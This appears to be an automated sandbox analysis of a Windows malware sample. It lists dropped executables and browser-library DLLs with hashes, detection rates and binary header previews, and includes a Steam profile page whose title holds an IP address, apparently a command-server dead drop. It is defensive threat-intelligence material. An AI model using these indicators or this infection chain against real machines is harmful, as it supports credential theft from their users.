                                                                              SHA-512:3947FA01E4FC2BF264C74243824FF4CCE931097C45B770493769C9B6937B9B5507C399341B2DBBFB138CA1A01849FC7C240EC4AD41F38E71727830F15D16F4A1
                                                                              Malicious:false
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.1.8.5.3.9.2.3.4.1.4.4.9.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.1.8.5.3.9.2.8.7.2.7.0.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.3.7.4.a.a.5.a.-.a.b.c.7.-.4.0.1.3.-.9.d.c.4.-.d.7.a.4.2.3.4.7.3.3.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.e.e.1.6.e.c.4.-.6.7.1.1.-.4.2.d.9.-.b.1.b.2.-.8.d.c.6.4.8.5.0.c.d.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.4.4.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.7.8.-.0.0.0.1.-.0.0.1.4.-.c.c.b.a.-.9.b.d.a.4.5.a.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.7.7.8.b.8.8.5.4.c.d.7.4.e.3.8.8.f.c.3.3.3.b.c.1.f.e.f.1.3.b.b.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.e.8.9.a.f.e.b.6.1.c.1.d.0.8.5.2.4.1.2.4.8.0.e.e.2.0.2.d.4.8.c.7.d.5.a.c.e.b.!.F.4.4.1...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.5.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER93BD.tmp.dmp

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:Mini DuMP crash report, 15 streams, Sun May 26 08:23:12 2024, 0x1205a4 type
                                                                              Category:dropped
                                                                              Size (bytes):52894
                                                                              Entropy (8bit):2.830995868593885
                                                                              Encrypted:false
                                                                              SSDEEP:384:+hbUjDtaeTBmY3a2f0FHhZHo1Cg0UQj7D:gbU3TBHq2f0FHhZHoLfQ7
                                                                              MD5:9E5235DCD44CFB38D84CE7E624AA5205
                                                                              SHA1:475B0F36D00D0348B09FA65B4B471FECFAE8C6A6
                                                                              SHA-256:F743B5CD52A9E756841448C928E9A1244B75B91EF24DDFFE080D696DC34917B2
                                                                              SHA-512:2DBA91A4D1022763DB8AC5840DEA590FE33A4F252C02A8C3A143A8B077F2D17FF48F9B918B26AF1B80EEF336320F0B96BBA8B76CF53EFA8CE358EF1E9B49E93D
                                                                              Malicious:false
                                                                              Preview:MDMP..a..... .......p.Rf............4...............H........................1..........`.......8...........T............>..............x ..........d"..............................................................................eJ......."......GenuineIntel............T.......x...G.Rf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER94B8.tmp.WERInternalMetadata.xml

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):8288
                                                                              Entropy (8bit):3.694308257143958
                                                                              Encrypted:false
                                                                              SSDEEP:192:R6l7wVeJPR6S86Y9rSULhgmfPopDy89blJsfo3m:R6lXJp6B6YBSULhgmfPOlifF
                                                                              MD5:76B7472523084A5986E2C4100E7906F3
                                                                              SHA1:988860BAE933A5E7A8494E061CC7D0D986F9672F
                                                                              SHA-256:5F02BDA1A7692F206230DE9782784D827C4B25E8677CD2BB4FD2576351DBABF1
                                                                              SHA-512:12C2BC16D27D24A10BAED3804F080C86777D8043BD859DB908EBCB7FB318030074CB78B6772F01C573A14661A6188D23C4ED60AD30D2D9C61E17E20761B7AA11
                                                                              Malicious:false
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.9.2.<./.P.i.

                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER94E8.tmp.xml

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4537
                                                                              Entropy (8bit):4.4352162046648
                                                                              Encrypted:false
                                                                              SSDEEP:48:cvIwWl8zsHCJg77aI983WpW8VYLqYm8M4JwMfpMFX22+q8FziKmTmTogd:uIjfwI7SG7VyJwMBn2AzFmTgogd
                                                                              MD5:3053D2BE1C2B94C27C17149249B0F4B9
                                                                              SHA1:12EF54FCFA81AE79D6259F18A5CDCCBD8C2ECC9E
                                                                              SHA-256:492FF479F0DBB891202C5751EFC0765E6A2583EB026F8545B0236CDB05493965
                                                                              SHA-512:3A060E255BA9336C1429B3D5B6051BF3D22AD0663FFA0E58BB0C60190D502C3152454D9D0E9AF832AE1FE130EE72C74E47BEF0A4F7E16485E7895AAD91FEC559
                                                                              Malicious:false
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="339805" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199689717899[1].htm

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):35682
                                                                              Entropy (8bit):5.380976277523381
                                                                              Encrypted:false
                                                                              SSDEEP:768:s7pqLtWYmwt5D0gqOaiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2SL:s78LtWYmwt5D0gqOac7PzzgiJmDzJtx3
                                                                              MD5:1466716F0C9153F76BB57D4860843664
                                                                              SHA1:060D12CA6D7A80B42795403C5A6A233B9F259F26
                                                                              SHA-256:FAFEE04A5A012597F585AEE58155A34C5531E7E7E1F91D60B9FE893F8E7CBB29
                                                                              SHA-512:9FFEB17451760CBDB1A861B2C6C4E4087E7E984005963C0B33BB26FA94C2A388C61ED992107B3543DE5D98F5BC267288DEB1AF14A296D607D22138E7AEE2726A
                                                                              Malicious:false
                                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://65.109.242.59|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2459136
                                                                              Entropy (8bit):6.052474106868353
                                                                              Encrypted:false
                                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):685392
                                                                              Entropy (8bit):6.872871740790978
                                                                              Encrypted:false
                                                                              SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                              MD5:550686C0EE48C386DFCB40199BD076AC
                                                                              SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                              SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                              SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):608080
                                                                              Entropy (8bit):6.833616094889818
                                                                              Encrypted:false
                                                                              SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                              MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                              SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                              SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                              SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):450024
                                                                              Entropy (8bit):6.673992339875127
                                                                              Encrypted:false
                                                                              SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                              MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                              SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                              SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                              SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2046288
                                                                              Entropy (8bit):6.787733948558952
                                                                              Encrypted:false
                                                                              SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                              MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                              SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                              SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                              SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):257872
                                                                              Entropy (8bit):6.727482641240852
                                                                              Encrypted:false
                                                                              SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                              MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                              SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                              SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                              SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):80880
                                                                              Entropy (8bit):6.920480786566406
                                                                              Encrypted:false
                                                                              SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                              MD5:A37EE36B536409056A86F50E67777DD7
                                                                              SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                              SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                              SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\9EDA.exe

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:modified
                                                                              Size (bytes):2121216
                                                                              Entropy (8bit):6.847302783302968
                                                                              Encrypted:false
                                                                              SSDEEP:49152:s4K3x1vU6JtTF+TxMoxc1TU+j+dAzGwlrh:s4Ex186tIuoITsdZ
                                                                              MD5:7BDE08F5DD2A433DAE25A8F8B3E70970
                                                                              SHA1:648FF6ECDB0E0769055EA8FFC49A78D6833632E4
                                                                              SHA-256:3F8A5414C8ED56D541974D3B650C9CF798A2FDEFEAF5FB307540FD64C99D29D5
                                                                              SHA-512:5BF3773D438E15077C129B45767536B63D304989C7DCBAFF12417550AE29E1858CD825024A351C9B3F418BCD619226BF5580AB01EF840A8B9BAAC95617FB166A
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................P............... ....@........................... ..................@...........................`..J"...p...D......................<...................................................................................CODE................................ ..`DATA.....&... ...(..................@...BSS.....-....P.......6...................idata..J"...`...$...6..............@....tls.................Z...................rdata...............Z..............@..P.reloc..<............\..............@..P.rsrc....D...p...D..................@..P.............. ......^ .............@..P........................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\F441.exe

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):325120
                                                                              Entropy (8bit):7.384635086921583
                                                                              Encrypted:false
                                                                              SSDEEP:6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
                                                                              MD5:EA9DD1EAE2E521666D3F06382104EC10
                                                                              SHA1:46E89AFEB61C1D0852412480EE202D48C7D5ACEB
                                                                              SHA-256:472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
                                                                              SHA-512:1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 96%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[7..:Y.:Y.:Y.h..:Y.h...:Y.h..:Y.B..:Y.:X..:Y.1...:Y.h..:Y.1...:Y.Rich.:Y.........................PE..L......c.....................t.......=....... ....@.................................p..........................................d...................................H................................x..@............ ..d............................text...3........................... ..`.rdata...l... ...n..................@..@.data....F...........~..............@....rsrc................L..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\kat796E.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Local\Temp\9EDA.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):881664
                                                                              Entropy (8bit):6.555251818096116
                                                                              Encrypted:false
                                                                              SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                                              MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                                              SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                                              SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                                              SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\sdveeeu

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):240128
                                                                              Entropy (8bit):6.768367883653815
                                                                              Encrypted:false
                                                                              SSDEEP:3072:a5My9dAbFfJ30bYKMy+WlmKwkGLVmWDju8Ogxsqtoe8MGRT8:UUbFfJEb7LM5t9OgfdaRT
                                                                              MD5:73DDF9A7F42E0452B6AA00F4E0A0AFD5
                                                                              SHA1:79EA2D473E72751803C9650AE5C6B144A0AA4879
                                                                              SHA-256:C166B490846D441400727765DD668262087642BAE1BBFD7AAF7A1BED5AA35B62
                                                                              SHA-512:C7931368FFFEB684C6DE5A7AFFE168F11C1E1D5FED5F843FB0FF98F393C49909E202FB7D500F126097F5E5DDF69BEB1FE900C27BD918C2D8D4A69C451B053ED5
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              • Antivirus: ReversingLabs, Detection: 39%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*..Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5...Ko......Ko.5...Ko.Rich.Ko.........................PE..L...U#ee.............................C............@.................................,........................................i..P...................................Dj..............................P_..@...............l............................text...1........................... ..`.rdata..8r.......t..................@..@.data... 6.......|...\..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Roaming\sdveeeu:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Windows\explorer.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                              Entropy (8bit):6.768367883653815
                                                                              TrID:
                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:4.exe
                                                                              File size:240'128 bytes
                                                                              MD5:73ddf9a7f42e0452b6aa00f4e0a0afd5
                                                                              SHA1:79ea2d473e72751803c9650ae5c6b144a0aa4879
                                                                              SHA256:c166b490846d441400727765dd668262087642bae1bbfd7aaf7a1bed5aa35b62
                                                                              SHA512:c7931368fffeb684c6de5a7affe168f11c1e1d5fed5f843fb0ff98f393c49909e202fb7d500f126097f5e5ddf69beb1fe900c27bd918c2d8d4a69c451b053ed5
                                                                              SSDEEP:3072:a5My9dAbFfJ30bYKMy+WlmKwkGLVmWDju8Ogxsqtoe8MGRT8:UUbFfJEb7LM5t9OgfdaRT
                                                                              TLSH:6134BF017EDCD475E96346304834CAA5667EFCB6FA658A4733883F0FB8317906B62762
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*...Ko..Ko..Ko......Ko......Ko......Ko..3...Ko..Kn..Ko.5....Ko......Ko.5....Ko.Rich.Ko.........................PE..L...U#ee...

                                                                              File Icon

                                                                              Icon Hash:714145254148404b

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4043e7
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
